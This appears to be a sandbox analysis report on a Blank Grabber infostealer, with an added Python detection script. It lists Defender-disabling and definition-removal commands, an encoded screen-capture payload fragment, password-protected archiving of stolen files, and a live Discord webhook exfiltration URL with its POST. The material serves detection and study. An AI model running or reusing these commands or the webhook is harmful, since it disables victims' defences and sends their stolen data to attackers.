Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\cmd.exe", ParentImage: C:\Users\user\Desktop\cmd.exe, ParentProcessId: 7280, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 8076, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\cmd.exe", ParentImage: C:\Users\user\Desktop\cmd.exe, ParentProcessId: 7280, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", ProcessId: 7332, ProcessName: cmd.exe
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Users\user\Desktop\cmd.exe, ProcessId: 7280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\cmd.exe, ProcessId: 7280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUA
ZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\cmd.exe, ProcessId: 7280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr
              Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8300, TargetFilename: C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline
              Source: Process started; Author: Timur Zinniatullin, E.M. Anhaus, oscd.community; Data: Command: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9148, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *, ProcessId: 9204, ProcessName: rar.exe
              Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7340, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7484, ProcessName: powershell.exe
              Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6044, ProcessName: svchost.exe

              Data Obfuscation

              Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              No Suricata rule has matched
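              The Sigma hits above form one chain. The UTF-16LE base64 fragment at the top of this section is the tail of the -EncodedCommand: it decodes to C# screen-capture code (a loop cloning Bitmap objects into a results list) followed by Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, which is exactly why csc.exe is spawned from %TEMP% under that PowerShell parent. A separate cmd.exe turns off Defender's real-time, IOAV and script scanning with Set-MpPreference, then strips its signatures with MpCmdRun.exe -RemoveDefinitions -All. Finally rar.exe packages the loot with -hp"blank", which encrypts file names as well as file data under the password "blank"; note that console rar.exe only writes RAR format, so DBdXv.zip is a RAR archive despite its extension. The block below is an added example and is neither the Sigma rules nor Joe Sandbox code: a small Python matcher that expresses those detections over constructed process-creation events modelled on the command lines above, and that decodes -EncodedCommand before matching so a base64-wrapped Set-MpPreference is caught as well. The exclusion-path script inside the sample encoded command is constructed for the example; the 40-character base64 sample is the start of the fragment shown on this page.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation event (Sysmon EID 1 / Security 4688 shape)."""
    process_id: int
    image: str
    command_line: str
    parent_image: str = ""
    parent_command_line: str = ""


# -EncodedCommand / -enc / -ec followed by a base64 blob; PowerShell decodes it as UTF-16LE.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(command_line: str) -> str:
    """Return the script hidden behind -EncodedCommand, or '' if there is none or it is invalid."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return ""
    b64 = m.group(1)
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


@dataclass
class Rule:
    name: str
    image_suffix: str          # case-insensitive endswith on the image path
    all_of: tuple = ()         # every substring must appear in the (decoded) command line
    any_of: tuple = ()         # at least one must appear
    regex: str = ""            # optional extra pattern on the command line
    parent_any_of: tuple = ()  # at least one must appear in the parent command line

    def matches(self, ev: ProcessEvent) -> bool:
        if not ev.image.lower().endswith(self.image_suffix):
            return False
        # Match on the visible command line plus whatever -EncodedCommand hides.
        text = (ev.command_line + " " + decode_encoded_command(ev.command_line)).lower()
        if not all(s in text for s in self.all_of):
            return False
        if self.any_of and not any(s in text for s in self.any_of):
            return False
        if self.regex and not re.search(self.regex, text):
            return False
        parent = ev.parent_command_line.lower()
        if self.parent_any_of and not any(s in parent for s in self.parent_any_of):
            return False
        return True


RULES = [
    Rule("defender_tamper", "powershell.exe", all_of=("set-mppreference",),
         any_of=("-disablerealtimemonitoring $true", "-disableioavprotection $true",
                 "-disablescriptscanning $true", "-mapsreporting disabled",
                 "-submitsamplesconsent neversend", "-exclusionpath")),
    Rule("defender_definitions_removed", "cmd.exe", all_of=("mpcmdrun.exe", "-removedefinitions")),
    Rule("executionpolicy_bypass", "powershell.exe", any_of=("-executionpolicy bypass", "-ep bypass")),
    Rule("rar_password_archive", "rar.exe", regex=r"\s-(?:hp|p)\S"),   # -p<pwd> or -hp<pwd>
    Rule("csc_compile_from_temp", "csc.exe", all_of=("\\appdata\\local\\temp\\",),
         parent_any_of=("-encodedcommand", "-enc ", "-ec ")),
]


def detect(events):
    """Return sorted (rule name, pid) pairs for every rule each event triggers."""
    return sorted((r.name, ev.process_id) for ev in events for r in RULES if r.matches(ev))


# Constructed (hypothetical) script for the encoded sample; mirrors the "Adds a directory
# exclusion to Windows Defender" behaviour listed in the report's signature overview.
INNER_SCRIPT = "Set-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Local\\Temp'"
ENCODED = base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii")
PAGE_FRAGMENT = "ZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkA"  # first 40 chars of the fragment above

SAMPLE_EVENTS = [  # constructed, modelled on the Sigma hits in this report
    ProcessEvent(9204, r"C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe",
                 r'C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *',
                 parent_image=r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(7484, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true "
                 "-DisableRealtimeMonitoring $true -DisableScriptScanning $true -Force -MAPSReporting Disabled "
                 "-SubmitSamplesConsent NeverSend"),
    ProcessEvent(7340, r"C:\Windows\System32\cmd.exe",
                 r'C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -SubmitSamplesConsent 2 & '
                 r'"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"'),
    ProcessEvent(8300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + ENCODED),
    ProcessEvent(9300, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
                 r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"',
                 parent_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 parent_command_line="powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + ENCODED),
    # Benign controls: querying Defender state and an unencrypted backup archive must not fire.
    ProcessEvent(100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell Get-MpPreference"),
    ProcessEvent(101, r"C:\Program Files\WinRAR\Rar.exe", "Rar.exe a -r backup.rar *"),
]

if __name__ == "__main__":
    print(decode_encoded_command("powershell -enc " + PAGE_FRAGMENT))
    for name, pid in detect(SAMPLE_EVENTS):
        print(f"{name:32s} pid={pid}")
```

              Two caveats a responder should keep in mind: matching must run on the decoded script, not just the visible command line, or the Set-MpPreference variant on pid 8300 is missed; and the rar rule keys on the -p/-hp switch rather than on the archive extension, because the extension here is misleading.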


              AV Detection

              Source: cmd.exe.7280.1.memstrmin; Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2eP5UOyLvUjSMysvJJlJbg0"}
              Source: cmd.exe; ReversingLabs: Detection: 36%
              Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe; Code function: 65_2_00007FF69A3F901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 65_2_00007FF69A3F901C
              Source: cmd.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: cmd.exe, 00000001.00000002.2102140495.00007FFDFB076000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB30E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: cmd.exe, 00000000.00000003.1697672664.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2108397549.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: cmd.exe, 00000001.00000002.2106778885.00007FFE126D1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: cmd.exe, 00000000.00000003.1697672664.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2108397549.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: cmd.exe, 00000001.00000002.2107248205.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: cmd.exe, 00000001.00000002.2105906140.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: cmd.exe, 00000001.00000002.2103718969.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000041.00000000.1938364077.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp, rar.exe.0.dr
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.pdb source: powershell.exe, 0000002A.00000002.1859004442.000002168CE46000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: cmd.exe, 00000001.00000002.2106340866.00007FFE11EDC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: cmd.exe, 00000001.00000002.2106340866.00007FFE11EDC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.pdbhP source: powershell.exe, 0000002A.00000002.1859004442.000002168CE46000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: cmd.exe, 00000001.00000002.2107479396.00007FFE13301000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: cmd.exe, 00000001.00000002.2101639758.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: cmd.exe, 00000001.00000002.2102140495.00007FFDFB076000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: cmd.exe, 00000001.00000002.2105061798.00007FFE0EB41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: cmd.exe, 00000001.00000002.2105587009.00007FFE11511000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: )i.pdb source: powershell.exe, 0000002A.00000002.1915922706.00000216A4BB6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: cmd.exe, 00000001.00000002.2107751391.00007FFE13331000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:15:42 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB30E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: cmd.exe, 00000001.00000002.2105325798.00007FFE10301000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB390000.00000040.00000001.01000000.0000000F.sdmp
              Source: C:\Users\user\Desktop\cmd.exe; Code function: 0_2_00007FF70AEF83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00007FF70AEF83B0
              Source: C:\Users\user\Desktop\cmd.exe; Code function: 0_2_00007FF70AEF92F0 FindFirstFileExW,FindClose, 0_2_00007FF70AEF92F0
              Source: C:\Users\user\Desktop\cmd.exe; Code function: 0_2_00007FF70AF118E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF70AF118E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe; Code function: 65_2_00007FF69A4046EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 65_2_00007FF69A4046EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe; Code function: 65_2_00007FF69A3FE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 65_2_00007FF69A3FE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe; Code function: 65_2_00007FF69A4488E0 FindFirstFileExA, 65_2_00007FF69A4488E0
              Source: C:\Users\user\Desktop\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
              Source: C:\Users\user\Desktop\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
              Source: C:\Users\user\Desktop\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
              Source: C:\Users\user\Desktop\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
              Source: C:\Users\user\Desktop\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
              Source: C:\Users\user\Desktop\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
              Source: Joe Sandbox View; IP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox View; IP Address: 162.159.128.233 162.159.128.233
              Source: unknown; DNS query: name: ip-api.com
              Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic; HTTP traffic detected:
                  GET /json/?fields=225545 HTTP/1.1
                  Host: ip-api.com
                  Accept-Encoding: identity
                  User-Agent: python-urllib3/2.2.3
              Source: cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global traffic; DNS traffic detected: DNS query: ip-api.com
              Source: global traffic; DNS traffic detected: DNS query: discord.com
              Source: unknown; HTTP traffic detected:
                  POST /api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2eP5UOyLvUjSMysvJJlJbg0 HTTP/1.1
                  Host: discord.com
                  Accept-Encoding: identity
                  Content-Length: 699973
                  User-Agent: python-urllib3/2.2.3
                  Content-Type: multipart/form-data; boundary=deddcaf575f75e2dd616d5b567df1560
              Source: global traffic; HTTP traffic detected:
                  HTTP/1.1 404 Not Found
                  Date: Sat, 23 Nov 2024 18:44:40 GMT
                  Content-Type: application/json
                  Content-Length: 45
                  Connection: close
                  Cache-Control: public, max-age=3600, s-maxage=3600
                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                  x-ratelimit-limit: 5
                  x-ratelimit-remaining: 4
                  x-ratelimit-reset: 1732387481
                  x-ratelimit-reset-after: 1
                  via: 1.1 google
                  alt-svc: h3=":443"; ma=86400
                  CF-Cache-Status: DYNAMIC
